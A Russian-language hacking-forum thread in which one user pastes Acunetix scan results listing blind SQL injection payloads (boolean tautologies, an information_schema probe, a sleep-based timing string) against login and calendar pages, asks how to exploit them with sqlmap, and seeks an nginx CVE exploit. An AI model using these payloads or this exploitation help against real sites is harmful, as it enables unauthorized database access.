1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Помощь с acunetix

Тема в разделе "Web-хакинг", создана пользователем Lix, 5 фев 2016.

  1. Lix
    Lix Новичок
    Симпатии:
    0
    Код:
    Blind SQL Injection
    Vulnerability description
    This script is possibly vulnerable to SQL Injection attacks.
    
    SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
    
    This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
    This vulnerability affects /logins.php.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    URL encoded POST input txtUser was set to -1' OR 3*2*1=6 AND 000224=000224 --
    
    Tests performed:
    -1' OR 2+224-224-1=0+0+0+1 -- => TRUE
    -1' OR 3+224-224-1=0+0+0+1 -- => FALSE
    -1' OR 3*2<(0+5+224-224) -- => FALSE
    -1' OR 3*2>(0+5+224-224) -- => FALSE
    -1' OR 2+1-1-1=1 AND 000224=000224 -- => TRUE
    -1' OR 000224=000224 AND 3+1-1-1=1 -- => FALSE
    -1' OR 3*2=5 AND 000224=000224 -- => FALSE
    -1' OR 3*2=6 AND 000224=000224 -- => TRUE
    -1' OR 3*2*0=6 AND 000224=000224 -- => FALSE
    -1' OR 3*2*1=6 AND 000224=000224 -- => TRUE
    Пробую вот так
    /logins.php?txtUser=1'

    Ошибки нет,подскажите что делаю не так
     
    5 фев 2016
  2. mailmen
    mailmen Новичок
    Симпатии:
    0
    Привет. Слишком много нюансов придется объяснять. Ознакомьтесь с этим постом:

    https://xaker.name/threads/4/
     
    6 фев 2016
  3. Lix
    Lix Новичок
    Симпатии:
    0
    Не буду создавать новую тему!
    Не могу найти эксплойт под cve-2014-0133
     
    6 фев 2016
  4. mailmen
    mailmen Новичок
    Симпатии:
    0
    Проблема затрагивает Nginx 1.3.15 - 1.5.11 , составленный с модулем ngx_http_spdy_module (который не компилируется по умолчанию) и без -с - отладки опцией настраивать, если включена опция " SPDY " директивы " слушать " в конфигурации.

    На сколько я понимаю, под нее нету пабли сплойта...
     
    7 фев 2016
  5. Lix
    Lix Новичок
    Симпатии:
    0
    SQL injection
    [​IMG][​IMG]
    Vulnerability description
    This script is possibly vulnerable to SQL Injection attacks.

    SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.

    This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
    This vulnerability affects /.
    Discovered by: Scripting (Sql_Injection.script).
    Attack details
    Path Fragment input / was set to 1'"
    Error message found:
    Unclosed quotation mark

    как сделать запрос? на эту скулю
     
    9 фев 2016
  6. Lix
    Lix Новичок
    Симпатии:
    0
    city/1' как раскрутить такую скулю?
     
    9 фев 2016
  7. mailmen
    mailmen Новичок
    Симпатии:
    0
    Не факт что эта фича эксплоитная. Хавичем пробовали?
     
    10 фев 2016
  8. Lix
    Lix Новичок
    Симпатии:
    0
    В мапе пишет
    [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) byusing higher verbosity levels


    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    URL encoded GET input order was set to 1,(select case when (3*2*1=6 AND 000513=000513) then 1 else 1*(select table_name from information_schema.tables)end)=1

    This vulnerability affects /tools/calendar.php.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    URL encoded GET input date was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
    Подскажите как раскрутить мапом
     
    22 фев 2016
  9. mailmen
    mailmen Новичок
    Симпатии:
    0
    22 фев 2016
  10. Lix
    Lix Новичок
    Симпатии:
    0
    22 фев 2016

Поделиться этой страницей

Загрузка...